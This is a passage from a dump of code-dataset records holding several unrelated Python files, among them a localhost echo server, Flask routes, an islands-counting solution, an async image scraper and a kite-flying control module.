Can be anything from \"1\" to \"15d\"\n\n :return: int An integer representation of the grade\n \"\"\"\n mapping = ['3rd', '4th', 'Easy 5th', '0', \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\",\n \"10a\", \"10b\", \"10c\", \"10d\", \"11a\", \"11b\", \"11c\", \"11d\", \"12a\", \"12b\", \"12c\", \"12d\", \"13a\", \n \"13b\", \"13c\", \"13d\", \"14a\", \"14b\", \"14c\", \"14d\", \"15a\", \"15b\", \"15c\", \"15d\"]\n if route_str[-1] == '+' or route_str[-1] == '-':\n route_str = route_str[:-1]\n if route_str == '10':\n route_str = '10a'\n if route_str == '11':\n route_str = '11a'\n if route_str == '12':\n route_str = '12a'\n if route_str == '13':\n route_str = '13a'\n if route_str == '14':\n route_str = '14a'\n if route_str == '15':\n route_str = '15a'\n\n try:\n return mapping.index(route_str.lower())\n except ValueError:\n return None\n","sub_path":"mysite/bootstrap4/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"117794835","text":"# -*- coding: utf-8 -*-\r\nimport socket\r\nimport threading\r\nfrom datetime import datetime\r\nimport time\r\n\r\nHOST = '127.0.0.1' # サーバーのIPアドレス\r\nPORT = 10500 # サーバーの待ち受けポート\r\nDATESIZE = 1024 # 受信データバイト数\r\nCLIENTNUM = 3 # クライアントの接続上限数\r\n\r\n# サーバー起動 \r\ndef run_server():\r\n\r\n # server_socketインスタンスを生成\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:\r\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n server_socket.bind((HOST, PORT))\r\n server_socket.listen(CLIENTNUM)\r\n print('[{}] run server'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\r\n \r\n while True:\r\n # クライアントからの接続要求受け入れ\r\n client_socket, address = server_socket.accept()\r\n print('[{0}] connect client -> address : {1}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), address) )\r\n client_socket.settimeout(60)\r\n # クライアントごとにThread起動 send/recvのやり取りをする\r\n t = threading.Thread(target = conn_client, args = (client_socket,address))\r\n t.setDaemon(True)\r\n t.start()\r\n\r\n# クライアントごとにThread起動する関数\r\ndef conn_client(client_socket, address):\r\n \r\n with client_socket:\r\n while True:\r\n # クライアントからデータ受信\r\n rcv_data = client_socket.recv(DATESIZE)\r\n if rcv_data:\r\n # データ受信したデータをそのままクライアントへ送信\r\n client_socket.send(rcv_data)\r\n print('[{0}] recv date : {1}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), rcv_data.decode('utf-8')) )\r\n else:\r\n break\r\n\r\n print('[{0}] disconnect client -> address : {1}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), address) )\r\n\r\nif __name__ == \"__main__\":\r\n \r\n run_server()","sub_path":"test_ample/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"543686549","text":"from flask_app import app\r\nfrom flask import render_template, redirect, request\r\nfrom flask_app.models.dojo import Dojo\r\n\r\n\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return redirect(\"/dojos\")\r\n\r\n@app.route(\"/dojos\")\r\ndef show_all():\r\n dojos = Dojo.get_all()\r\n return render_template(\"dojos.html\", all_dojos=dojos)\r\n\r\n@app.route(\"/dojo/\")\r\ndef show_one(id):\r\n data = {\r\n \"id\":id\r\n }\r\n return render_template(\"dojo.html\", dojo = Dojo.get_one_ninjas(data))\r\n\r\n\r\n@app.route(\"/create/dojo\", methods=[\"POST\"])\r\ndef create_dojo():\r\n Dojo.add(request.form)\r\n return redirect('/')","sub_path":"dojos_ninjas/flask_app/controllers/dojos.py","file_name":"dojos.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"341038274","text":"from db import db\nimport users\n\ndef get_list():\n sql = \"SELECT M.content, U.username, M.sent_at FROM messages M, users U WHERE M.user_id=U.id ORDER BY M.id\"\n result = db.session.execute(sql)\n return result.fetchall()\n\ndef send(content):\n user_id = users.user_id()\n if user_id == 0:\n return False\n sql = \"INSERT INTO messages (content, user_id, sent_at) VALUES (:content, :user_id, NOW())\"\n db.session.execute(sql, {\"content\":content, \"user_id\":user_id})\n db.session.commit()\n return True\n","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"585754947","text":"from collections import defaultdict\n\n\"\"\"\nDefinition for a point.\n\"\"\"\nclass Point:\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\n\nclass Solution:\n \"\"\"\n @param n: An integer\n @param m: An integer\n @param operators: an array of point\n @return: an integer array\n \"\"\"\n def numIslands2(self, n, m, operators):\n # write your code here\n sea = [[0] * m for _ in range(n)]\n marker_to_island_map = dict()\n island_to_marker_map = defaultdict(list)\n marker = 1\n num_islands = []\n for op in operators:\n connected_islands = set()\n if sea[op.x][op.y] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x][op.y]])\n if op.x - 1 >= 0 and sea[op.x-1][op.y] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x-1][op.y]])\n if op.x + 1 < n and sea[op.x+1][op.y] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x+1][op.y]])\n if op.y - 1 >= 0 and sea[op.x][op.y-1] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x][op.y-1]])\n if op.y + 1 < m and sea[op.x][op.y+1] != 0:\n connected_islands.add(marker_to_island_map[sea[op.x][op.y+1]])\n if len(connected_islands) == 0:\n # Not connect to any islands.\n sea[op.x][op.y] = marker\n marker_to_island_map[marker] = marker\n island_to_marker_map[marker].append(marker)\n marker += 1\n elif len(connected_islands) == 1:\n # Connect only to one island.\n island = connected_islands.pop()\n sea[op.x][op.y] = island_to_marker_map[island][0]\n else:\n # Connect to more than one island.\n merge_to_island = connected_islands.pop()\n for island in connected_islands:\n for mk in island_to_marker_map[island]:\n marker_to_island_map[mk] = merge_to_island\n island_to_marker_map[merge_to_island].append(mk)\n island_to_marker_map.pop(island)\n sea[op.x][op.y] = island_to_marker_map[merge_to_island][0]\n num_islands.append(len(island_to_marker_map.keys()))\n return num_islands","sub_path":"python3/l0305_number_of_islands_2.py","file_name":"l0305_number_of_islands_2.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"333955934","text":"import asyncio\nimport os\nimport re\nimport time\n\nimport aiohttp\n\nstart_url = 'https://www.doutula.com/article/list/?page={num}'\nheaders = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'\n}\n\n\nasync def fetch_imglist(html):\n reg = re.compile(r'data-original=\"https://ws\\d(.*?)\".*?alt=\"(.*?)\"', re.S)\n imglist = reg.findall(html)\n return imglist\n\n\nasync def fetch_url(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url, headers=headers) as resp:\n html = await resp.text()\n imglist = await fetch_imglist(html)\n # 获得正则匹配数量和匹配的页面链接\n print('*' * 10, str(len(imglist)), url)\n return imglist\n\n\nasync def fetch_img(imglist):\n async with aiohttp.ClientSession() as session:\n for url, name in imglist:\n imgurl = \"http://ws1\" + url\n async with session.get(imgurl, headers=headers) as resp:\n content = await resp.read()\n # 创建文件名去掉非法字符\n fileName = re.sub('[\\/:*?\"<>|]', '-', name[:180] + url[-4:])\n try:\n with open('./pic/{}'.format(fileName), 'wb') as f:\n f.write(content)\n print('保存{}成功'.format(imgurl))\n except IOError as e:\n print('出错啦!{}{}'.format(e, imgurl))\n\n\nasync def main(x):\n url = start_url.format(num=x)\n print('页面链接为:{}'.format(url))\n imglist = await asyncio.ensure_future(fetch_url(url))\n await asyncio.ensure_future(fetch_img(imglist))\n\n\nif __name__ == '__main__':\n start = time.time()\n if not os.path.isdir('./pic'):\n os.mkdir('./pic')\n loop = asyncio.get_event_loop()\n tasks = [asyncio.ensure_future(main(x)) for x in range(1, 7)]\n # 最多处理5个页面\n loop.run_until_complete(asyncio.gather(*tasks))\n loop.close()\n print('total {} files,time cost:{}'.format(\n len(os.listdir('./pic')),\n time.time() - start))\n","sub_path":"Emoticon Files/Advanced learning/asyncio练习爬虫/spider04.py","file_name":"spider04.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100712526","text":"#!/usr/bin/env python\n#\n\"\"\"\nThis file should do the following things\n 1 Calculate a default route for the kite based on settings or parameters applied - done\n 2 Identify the flight zone which will be left, right or centre in fig8\n and park_left, park_right - done\n 3 Identify the flight mode - currently proposing park wiggle and fig8up we always start with park\n 4 Has phase change or zone changed or are we starting\n 3 Set route - otherwise we know the preferred route\n 4 Staring point will always be park and the target for that is kite angle of zero and to be at top of centre line\n 5 Probably then go left a bit and right a bit - lets call that wiggle mode - but we align first\n 6 Then move into fig 8 with upturns - let's always start left and should be aimed high - probably just need\n to display a centre line and always draw fig 8 and resize manually for now - full automation of that can\n be later - this will be set in motion manually\n 7 Once there we flick into upturn and measure turn radius for a few cycles - turn stops when kite is round 180deg\n 8 Then repeat to other side -\n 9 At some point we would switch to doing down turns but that can probably be well after upturns work reliably so\n 10 Upturns only for now\n\"\"\"\n\nimport os, time\nimport math\nfrom collections import deque\nfrom kite_funcs import checklimits, getresist, conmaxright, conmaxleft, conresistleft, conresistright, conresistcentre\nfrom move_func import move_item\nfrom dotenv import find_dotenv, load_dotenv\nload_dotenv(find_dotenv())\n\n\ndef calcbarangle(kite, base, controls):\n \"\"\"This should just basically set the target bar angle based on the mode phase\n and zone we are in when in park or wiggle mode\n >>> k=Kite(400, targetangle=10)\n >>> b=Base(barangle=15, kitebarratio=2)\n >>> c=Controls(1)\n >>> calcbarangle(k,b,c)\n 10\n\n >>> k=Kite(400, phase='TurnR', targetangle=10)\n >>> b=Base(barangle=15, kitebarratio=2)\n >>> c=Controls(1)\n >>> calcbarangle(k,b,c)\n 40\n \"\"\"\n\n if kite.phase == \"TurnR\" or kite.phase == \"TurnL\":\n return setangleturn(kite, base)\n else:\n return setangle(kite, base, controls)\n\n\ndef inferangle(kite, base, controls=None):\n \"\"\"This will return inferred angle of the control bar based on the kite angle\n obviously this is a huge approximation of reality but should help with review\n of actual changes of the bar versus what we would like to happen ie no lag when\n testing\n\n >>> k=Kite(400, kiteangle=10)\n >>> b=Base(barangle=15, kitebarratio=2.0)\n >>> c=Controls(1)\n >>> inferangle(k, b, c)\n 5.0\n \"\"\"\n return kite.kiteangle / base.kitebarratio\n\n\ndef setangle(kite, base, controls):\n \"\"\"This will return targetbarangle for park mode based largely on kite target angle\n We will start simple but may move to a pid mode if required\n\n >>> k=Kite(400, targetangle=10)\n >>> b=Base(barangle=15, kitebarratio=2)\n >>> c=Controls(1)\n >>> setangle(k,b,c)\n 10\n \"\"\"\n\n # targetbarangle = checklimits((kite.targetangle * base.kitebarratio), base.maxleft, base.maxright)\n targetbarangle = checklimits(kite.targetangle, base.maxleft, base.maxright)\n return targetbarangle\n\n\ndef setangleturn(kite, base):\n \"\"\"This should be a simple function as we will always aim to turn as fast as poss\n identifying the point to ease off from max turn should be done as part of phase setting and not here\n\n >>> k=Kite(400)\n >>> b=Base(400)\n >>> setangleturn(k,b)\n -40\n \"\"\"\n\n targetbarangle = base.maxright if kite.phase == 
\"TurnR\" else base.maxleft\n return targetbarangle\n\n\nclass Config(object):\n def __init__(self, source=2, kite='Standard', masklimit=10000,\n logging=0, numcams=1, check_motor_sim=False, setup='Standard'):\n self.source = source\n self.kite = kite\n self.masklimit = masklimit\n self.logging = logging\n self.numcams = numcams\n self.check_motor_sim = check_motor_sim\n self.setup = setup\n self.writer = None\n\n @staticmethod\n def getlogheaders():\n return ('source', 'kite', 'masklimit', 'numcams', 'check_motor_sim', 'setup')\n\n def getlogdata(self):\n return (self.source, self.kite, self.masklimit, self.numcams, self.check_motor_sim, self.setup)\n\n\nclass Base(object):\n def __init__(self, barangle=0, parkangle=0, maxright=conmaxright, maxleft=conmaxleft, lag=1,\n targetbarangle=0, kitebarratio=1, inferbarangle=0, resistleft=conresistleft,\n resistright=conresistright, resistcentre=conresistcentre, safety=False):\n self.barangle = barangle\n self.parkangle = parkangle\n self.maxright = maxright\n self.maxleft = maxleft\n self.lag = lag\n self.barangles = deque(maxlen=16)\n self.targetbarangle = targetbarangle\n self.inferbarangle = inferbarangle\n self.kitebarratio = kitebarratio # this will be the rate of change of barangle to kite angle\n self.mockangle = 0\n self.reset = False\n self.action = None\n self.resistance = 0\n self.dist_act = 35.0 # Radius from fulcrum to attachment point of actuator - we will have two actuators\n self.speed_act = 30.0\n self.actuator_length = 60\n self.calibrate = False\n self.calibrate_phase = 0\n self.start_time = 0\n self.calibrate_list = []\n self.resistright = resistright\n self.resistleft = resistleft\n self.resistcentre = resistcentre\n self.manual_calib_phases = ['Bar to straight (0 degrees) and press set or - key on wii',\n 'Bar to 20 degrees left and press set or - key on wii',\n 'Bar to 20 degrees right and press set or - key on wii']\n self.manual_calib_phase = 0\n self.plan_calibration()\n self.safety = safety\n\n @staticmethod\n def getlogheaders():\n return ('B.barangle', 'B.parkangle', 'B.maxright', 'B.maxleft', 'B.mockangle', 'B.targetbarangle',\n 'B.inferbarangle', 'B.action', 'B.resistance', 'B.dist_act', 'B.speed_act', 'B.calibrate',\n 'B.manual_calib_phase')\n\n def getlogdata(self):\n return (self.barangle, self.parkangle, self.maxright, self.maxleft, self.mockangle, self.targetbarangle,\n self.inferbarangle, self.action, self.resistance, self.dist_act, self.speed_act, self.calibrate,\n self.manual_calib_phase)\n\n\n def get_calibrate_time(self):\n # idea here is to have an expectation of how the setup should work based on components\n # believed to be there - and also identify if resistor is working as expected\n circ_act = 2 * math.pi * self.dist_act * 2 # because going to move each army separately\n rev_time = circ_act / self.speed_act # time for one revolution\n print(f\"self.maxright=\")\n return 1000 * (rev_time * self.maxright / 360.0) # expected time to get to max angle in millisecs\n\n def calibration_check(self):\n # This should basically wiggle the bar and put it into position to start if results\n # not good process would be to start manual calibration from the ManBar mode\n curr_millis = round(time.monotonic() * 1000)\n elapsed_millis = curr_millis - self.start_time\n if elapsed_millis > self.calibrate_list[self.calibrate_phase][1]:\n self.calibrate_list[self.calibrate_phase][2] = elapsed_millis\n self.calibrate_list[self.calibrate_phase][4] = self.resistance\n self.start_time = curr_millis\n self.calibrate_phase += 
1\n if self.calibrate_phase == 4: # valid values are 0 to 3 this is end of loop\n self.calibrate = False\n self.calibrate_phase = 0\n self.action = 0\n self.action = self.calibrate_list[self.calibrate_phase][5]\n else: # increase cycle counter\n self.calibrate_list[self.calibrate_phase][6] += 1\n self.calibrate_list[self.calibrate_phase][7].append(self.resistance)\n return\n\n def plan_calibration(self):\n # this should initalise a list of phases that the calibration will\n # take I think name, motormsg, target time, should work\n target_time = int(self.get_calibrate_time()) # this is assumed to be constant for all phases\n self.action = 6\n\n for x, y in enumerate(range(4)):\n if (x % 2) == 0:\n action = 'fullright'\n motor_action = 6 # Left motor activated\n target_resist = getresist(self.maxright)\n else:\n action = 'centre' # so right motor will drive\n motor_action = 7\n target_resist = getresist(0) # should return to square\n self.calibrate_list.append([action, target_time, 0, target_resist, 0, motor_action, 0, []])\n return\n\n def set_resistance(self, control):\n # this should set the resistance for particular angle on the base unit and\n # is triggered when the set button is pressed\n # TODO refactor resistance into a list or dict\n if self.manual_calib_phase == 0:\n self.resistcentre = self.resistance\n elif self.resistance != self.resistcentre: # avoid division by zero errs\n if self.manual_calib_phase == 1:\n self.resistleft = self.resistance\n else:\n self.resistright = self.resistance\n\n if self.manual_calib_phase < 2:\n self.manual_calib_phase += 1\n else:\n self.manual_calib_phase = 0\n print('Calibration Left Centre Right' + str(self.resistleft)\n + ' ' + str(self.resistcentre) + ' ' + str(self.resistright))\n # if self.manual_calib_phase < 2 else 0\n control.newbuttons = control.get_change_phase_buttons(self)\n return\n\n\nclass Kite(object):\n\n def __init__(self, x=0, y=0, mode='Park', phase='Park', targetheading=0, targetangle=0, kiteangle=0):\n self.x = x\n self.y = y\n self.mode = mode\n self.phase = phase\n self.pts = deque(maxlen=16)\n self.kiteangles = deque(maxlen=16)\n self.timestamps = deque(maxlen=16)\n (self.dX, self.dY) = (0, 0)\n self.direction = \"\"\n self.kiteangle = kiteangle\n self.contourarea = 0\n self.zone = \"Centre\"\n self.targettype = 'Angle'\n self.targetx = 0\n self.targety = 0\n self.changezone = True\n self.changephase = False\n self.routechange = False\n self.found = False\n self.targetheading = targetheading\n self.targetangle = targetangle\n self.thickness = 1\n self.leftballx = 0\n self.leftbally = 0\n self.rightballx = 0\n self.rightbally = 0\n self.turncomplete = False\n self.turncomplete_angle = 60\n self.autofly = False\n return\n\n\n @staticmethod\n def getlogheaders():\n return ('K.x', 'K.y', 'K.mode', 'K.phase', 'K.direction', 'K.kiteangle', 'K.contourarea',\n 'K.targettype', 'K.targetx', 'K.targety', 'K.changezone', 'K.changephase', 'K.routechange',\n 'K.changephase', 'K.routechange', 'K.found', 'K.targetheading', 'K.targetangle')\n\n\n def getlogdata(self):\n return (self.x, self.y, self.mode, self.phase, self.direction, self.kiteangle, self.contourarea,\n self.targettype, self.targetx, self.targety, self.changezone, self.changephase, self.routechange,\n self.changephase, self.routechange, self.found, self.targetheading, self.targetangle)\n\n def get_zone(self, leftx, rightx):\n \"\"\"\n >>> k=Kite(400)\n >>> k.get_zone(100,600)\n 'Left'\n\n >>> l=Kite(400)\n >>> l.get_zone(300,600)\n 'Centre'\n :param leftx:\n :param rightx:\n 
:return:\n \"\"\"\n\n self.zone = 'Left' if self.x < leftx else 'Right' if self.x > rightx else 'Centre'\n return self.zone\n\n def get_phase(self):\n if self.mode == 'Park':\n # For park this is now OK we want to get kiteangle to zero\n self.phase = 'Hold'\n elif self.mode == 'Wiggle':\n self.phase = 'Wiggle'\n else: # fig8 - assumed\n if self.zone == 'Centre':\n self.phase = 'Xwind'\n elif self.zone == 'Left':\n if self.turncomplete or self.kiteangle > self.turncomplete_angle:\n self.phase = 'Xwind'\n self.turncomplete = True\n self.routechange = True\n else:\n self.phase = 'TurnRight'\n else: # Right zone\n if self.turncomplete or self.kiteangle < (0 - self.turncomplete_angle):\n self.phase = 'Xwind'\n self.turncomplete = True\n self.routechange = True\n else:\n self.phase = 'Turnleft'\n return\n\n def update_zone(self, control):\n currentzone = self.zone\n self.get_zone(control.routepoints[0][0], control.routepoints[3][0])\n self.changezone = True if self.zone != currentzone else False\n if self.changezone: # set to false at start of next turn\n self.turncomplete = False\n return\n\n def update_phase(self):\n currentphase = self.phase\n self.get_phase()\n self.changephase = True if self.phase != currentphase else False\n return\n\n def get_wiggle_angle(self):\n x = -10 if self.kiteangle > 0 else 10\n return x\n\n def update_target(self, leftx, lefty, centrex, centrey, rightx, righty):\n # this gets called when mode, zone, phase or route changes\n if self.mode == 'Park':\n # For park this is now OK we want to get kiteangle to zero\n self.targettype = 'Angle'\n self.targetangle = 0\n self.targetx = centrex\n self.targety = centrey\n elif self.mode == 'Wiggle':\n self.targettype = 'Angle'\n self.targetangle = self.get_wiggle_angle()\n self.targetx = centrex\n self.targety = centrey\n else: # fig8 - by definition\n if self.zone == 'Centre' or self.phase == 'Xwind':\n # Either we have just left the right or left turnzone so if nearest\n # left we go right and if nearest right we go left\n # or we have changed from park or wiggle to xwind which will be presumed to happen\n # with kite upwards and seems reasonable to just go for the longer xwind distance\n self.targettype = 'Point'\n if abs(self.x - leftx) > abs(self.x - rightx):\n self.targetx = leftx\n self.targety = lefty\n else:\n self.targetx = rightx\n self.targety = righty\n # self.targetangle = get_heading_points((self.x, self.y), (self.targetx, self.targety))\n elif self.changezone: # think we should still set this roughly in the turn phase\n self.targettype = self.phase\n if self.phase == 'TurnR':\n self.targetangle = 90\n else:\n self.targetangle = -90\n # TODO - may compute the target location\n else:\n print('End of update_target reached without cover expected cases most likely')\n # TODO ensure change of flight mode is barred unless in the centre zone -\n # seems sensible and should\n # mean changemode and changephase generally only triggered in centre zone\n return\n\n def move_kite(self, control, speed=10):\n # This moves a manual kite in autofly mode towards the target while in the centre zone - however when\n # in turn the target only moves when we get back out of the turn zone so instead we probaby want to pick up\n # the apex of fig 8 and then on up to the top which we just fly through and then the target will change again\n # pass lets start with figuring out the actual targetx and targety\n if self.zone == 'Centre':\n movex, movey = self.targetx, self.targety\n # want to move beyond the target so extend x\n elif 
self.zone == 'Left': # this just takes us to top of zone\n movex, movey = control.routepoints[3]\n else: # Right\n movex, movey = control.routepoints[0]\n\n # Ensure we go past the point which toggles the change of zone\n adjustx = 20 if movex >= control.centrex else -20\n movex += adjustx\n self.x, self.y = move_item(self.x, self.y, movex, movey, speed)\n return\n\nclass Controls(object):\n\n def __init__(self, config='Standard', step=8, motortest=False):\n try: # this will fail on windows but don't need yet and not convinced I need to set parameters separately\n self.centrex = rospy.get_param('centrex', 800)\n self.centrey = rospy.get_param('centrey', 300)\n self.halfwidth = rospy.get_param('halfwidth', 200)\n self.radius = rospy.get_param('radius', 100)\n except (NameError, KeyError) as e:\n # mode='fig8'\n self.centrex = 400\n self.centrey = 300\n self.halfwidth = 200\n self.radius = 100\n self.routepoints = calc_route(self.centrex, self.centrey, self.halfwidth, self.radius)\n self.config = config # possible config ('Standard', 'Manual', 'Manbar')\n self.inputmode = 0 if self.config == 'Standard' else 2 if self.config == 'Manual' else 3\n self.step = step\n self.modestring = self.getmodestring(True)\n self.route = False\n self.maxy = 20 # this should be for top of centre line and sets they y target point for park mode\n self.slow = 0.0\n self.newbuttons = []\n self.motortest = motortest\n\n @staticmethod\n def getlogheaders():\n return ('C.config', 'C.inputmode', 'C.motortest')\n\n def getlogdata(self):\n return (self.config, self.inputmode, self.motortest)\n\n def getmodestring(self, inputmode):\n # So now always 11 buttons and first 5 and last 2 are std and iteration through should be std\n # so we would have a defined transition of names based on which change took place\n if inputmode == 0: # Standard\n return 'STD: Left Right Up Down Pause Wider Narrow Expand Contract Mode Quit'\n elif inputmode == 1:\n return 'SETFLIGHTMODE: Left Right Up Down Pause Park Wiggle Fig8 Reset Mode Quit'\n elif self.inputmode == 2:\n return 'MANFLIGHT: Left Right Up Down Pause Anti Clock Slow Fast Mode Quit'\n else: # inputmode = 3\n return 'MANBAR: Left Right Up Down Pause Anti Clock Slow Fast Mode Quit'\n\n @staticmethod\n def get_change_mode_buttons(inputmode):\n if inputmode == 0: # STD\n newbuttons = [('Mode: STD:', 'Mode: STD:'), ('Pause', 'Pause'), ('Wider', 'Wider'), ('Narrow', 'Narrow'),\n ('Expand', 'Expand'), ('Contract', 'Contract')]\n elif inputmode == 1: # SETFLIGHTMODE\n newbuttons = [('Mode: STD:', 'Mode: SETFLIGHTMODE:'), ('Wider', 'Park'), ('Narrow', 'Wiggle'),\n ('Expand', 'Fig8'), ('Contract', 'Autofly')]\n elif inputmode == 2:\n newbuttons = [('Mode: STD:', 'Mode: MANFLIGHT'), ('Wider', 'Anti'), ('Narrow', 'Clock'),\n ('Expand', 'Slow'), ('Contract', 'Fast')]\n else: # MANBAR\n newbuttons = [('Mode: STD:', 'Mode: MANBAR:'), ('Pause', 'Calib'), ('Expand', 'Set')]\n return newbuttons\n\n @staticmethod\n def get_change_phase_buttons(base):\n newbuttons = [('Mode: STD:', 'Mode:' + base.manual_calib_phases[base.manual_calib_phase])]\n return newbuttons\n\n def joyhandler(self, joybuttons, joyaxes, kite, base, control, event=None):\n # Using https://github.com/arnaud-ramey/rosxwiimote as a ros package to capture\n # the joystick message this was because std one tried to do bluetooth\n # connection to wiimote via python and it didn't work perhaps as only\n # seems to expect early versions of wiimote\n\n # The axes messages is as follows:\n # 0. 
left - right rocker(3 possible values: -1 = left 0 = released 1 = right)\n # 1. up - down rocker(3 possible values: -1 = left 0 = released 1 = right)\n # 2. nunchuk left - right joystick(floating value in the range - 1 = left..1 = right)\n # 3. nunchuk down - up joystick(floating value in the range - 1 = down.. 1 = up)\n\n # 0. XWII_KEY_A - this should change the mode\n # 1. XWII_KEY_B - this should toggle the rockers between move and stretch squashc\n # 2. XWII_KEY_PLUS - probably the faster button and poss some other things for playback\n # 3. XWII_KEY_MINUS - probably the slower button and poss some other things for playback in slow motion\n # 4. XWII_KEY_HOME this should be the quit key\n # 5. XWII_KEY_ONE this will do a pause or calibrate in manbar mode\n # 6. XWII_KEY_TWO and this will do a flight mode change\n # 7. XWII_KEY_C - so\n # 8. XWII_KEY_Z so bigger numchuck key should change manflight to angle kite\n\n # in terms of what we do with this the basic idea is that the nunchuk flies the kite\n # and the rockers support the route moving about\n reset_stitcher = False\n\n # events for all input modes\n if (joybuttons and joybuttons[0] == 1) or event == 'Mode': # modechange on A key\n self.inputmode += 1\n kite.barbasedangle = True if self.inputmode == 3 else False\n if self.inputmode == 4: # simple toggle around 3 modes\n self.inputmode = 0\n self.modestring = self.getmodestring(self.inputmode)\n self.newbuttons = self.get_change_mode_buttons(self.inputmode)\n base.calibrate = False # calibration always ends on Mode Change\n elif (joybuttons and joybuttons[5] == 1) or event == 'Pause': # pause on 1 key\n if control.inputmode == 3: # Manbar Calibrate\n base.calibrate = 'Manual' # then slow button becomes set to set and that actions and cycles\n base.safety = False # if starts true\n self.newbuttons = self.get_change_phase_buttons(base)\n elif not control.motortest:\n time.sleep(10)\n else:\n base.action = 500 # Stop\n elif joybuttons and joybuttons[3] == 1: # slow\n self.slow += 0.1\n elif joybuttons and joybuttons[2] == 1: # fast\n self.slow = 0.0\n\n # common handling when not in one of the man modes\n if self.inputmode == 0 or self.inputmode == 1:\n if (joybuttons and joyaxes[0] == -1) or event == 'Left': # left: # left\n if not control.motortest:\n self.centrex -= self.step\n kite.routechange = True\n else:\n base.action = 300\n elif (joybuttons and joyaxes[0] == 1) or event == 'Right': # right\n if not control.motortest:\n self.centrex += self.step\n kite.routechange = True\n else:\n base.action = 400\n elif (joybuttons and joyaxes[1] == 1) or event == 'Up': # up\n if not control.motortest:\n self.centrey -= self.step\n kite.routechange = True\n else:\n base.action = 100\n elif (joybuttons and joyaxes[1] == -1) or event == 'Down': # down\n if not control.motortest:\n self.centrey += self.step\n kite.routechange = True\n else:\n base.action = 200\n elif self.inputmode == 2 or self.inputmode == 3: # common events for Man modes\n if joybuttons:\n if joyaxes[0] != 0: # -1 = left +1 = right\n self.centrex += self.step * int(joyaxes[0])\n kite.routechange = True\n elif joyaxes[1] != 0: # 1 = up -1 = down so needs inverted\n self.centrey -= self.step * int(joyaxes[1])\n kite.routechange = True\n if event == 'Left': # left\n kite.x -= self.step\n elif event == 'Right': # right\n kite.x += self.step\n elif event == 'Up': # up\n kite.y -= self.step\n elif event == 'Down': # down\n kite.y += self.step\n elif event == 'Expand' or (joybuttons and joybuttons[3] == 1): # slow\n if 
base.calibrate != 'Manual':\n self.slow += 0.1\n else:\n base.set_resistance(control)\n time.sleep(0.5)\n elif event == 'Contract': # fast\n self.slow = 0.0\n\n if self.inputmode == 0: # Standard\n if event == 'Wider': # wider\n self.halfwidth += self.step\n elif event == 'Narrow': # narrower\n self.halfwidth -= self.step\n elif event == 'Expand': # expand\n self.radius += self.step\n elif event == 'Contract': # contract\n self.radius -= self.step\n elif self.inputmode == 1: # SetFlight\n if joybuttons and joybuttons[6] == 1: # move mode forward\n if kite.mode == 'Park':\n kite.mode = 'Wiggle'\n elif kite.mode == 'Wiggle':\n kite.mode = 'Fig8'\n else:\n kite.mode = 'Park'\n if event == 'Wider': # park\n kite.mode = 'Park'\n elif event == 'Narrow' and kite.zone == 'Centre': # must be in central zone to change mode\n kite.mode = 'Wiggle'\n elif event == 'Expand' and kite.zone == 'Centre': # must be in central zone to change mode\n kite.mode = 'Fig8'\n elif event == 'Contract': # Autofly\n # base.reset = True # don't think this ever did anything\n kite.autofly = True if kite.autofly == False else False\n elif self.inputmode == 2: # ManFlight - maybe switch to arrows - let's do this all\n if joybuttons:\n if joybuttons[7] == 0 and joybuttons[8] == 0:\n kite.x += (self.step * joyaxes[2])\n kite.y -= (self.step * joyaxes[3])\n else: # c or z button pressed angle the kite and automatically the bar\n kite.kiteangle += (self.step / 2 * joyaxes[2])\n if event == 'Wider': # anti clockwise\n kite.kiteangle -= self.step\n elif event == 'Narrow': # clockwise\n kite.kiteangle += self.step\n elif self.inputmode == 3: # ManBar - maybe switch to arrows - let's do this all\n if joybuttons:\n if joybuttons[7] == 0 and joybuttons[8] == 0:\n if joyaxes[2] < -0.1:\n base.action = int(300 - (joyaxes[2] * 99))\n elif joyaxes[2] > 0.1:\n base.action = int(400 + (joyaxes[2] * 99))\n elif joyaxes[3] > 0.1:\n base.action = int(100 + (joyaxes[3] * 99))\n elif joyaxes[3] < -0.1:\n base.action = int(200 - (joyaxes[3] * 99))\n else:\n base.action = 0\n print(base.action)\n else: # c or z button pressed\n kite.x += (self.step * joyaxes[2])\n kite.y -= (self.step * joyaxes[3])\n else:\n if event == 'Wider': # anti-clockwise\n base.action = 300\n elif event == 'Narrow': # clockwise\n base.action = 400\n else:\n base.action = 0\n\n return joybuttons and joybuttons[4] == 1, reset_stitcher # quit\n\n\ndef calc_route(centrex=400, centrey=300, halfwidth=200, radius=100):\n \"\"\"This just calculates the 6 points in our basic figure of eight\n should be easy enough and we then draw lines between each point and\n get the last point\n\n >>> calc_route(400, 300, 200, 100)\n 